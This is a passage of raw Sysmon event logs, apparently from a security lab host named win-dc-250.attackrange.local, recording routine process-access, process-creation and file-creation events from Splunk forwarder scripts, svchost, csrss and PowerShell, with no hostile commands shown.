CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.540{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429D-6000-6700-000000009A01}2748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.540{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429D-6000-6700-000000009A01}2748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.540{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429D-6000-6700-000000009A01}2748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.542{08A6967A-429D-6000-6B00-000000009A01}2748C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.509{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-429D-6000-6900-000000009A01}856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.509{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-429D-6000-6900-000000009A01}856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.478{08A6967A-429D-6000-6900-000000009A01}856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_jzdhehkn.4zs.ps12021-01-14 13:09:49.478 10341000x80000000000000002337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-429D-6000-6900-000000009A01}856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.432{08A6967A-429D-6000-6A00-000000009A01}40203748C:\Windows\system32\conhost.exe{08A6967A-429D-6000-6900-000000009A01}856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.424{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-429D-6000-6A00-000000009A01}4020C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 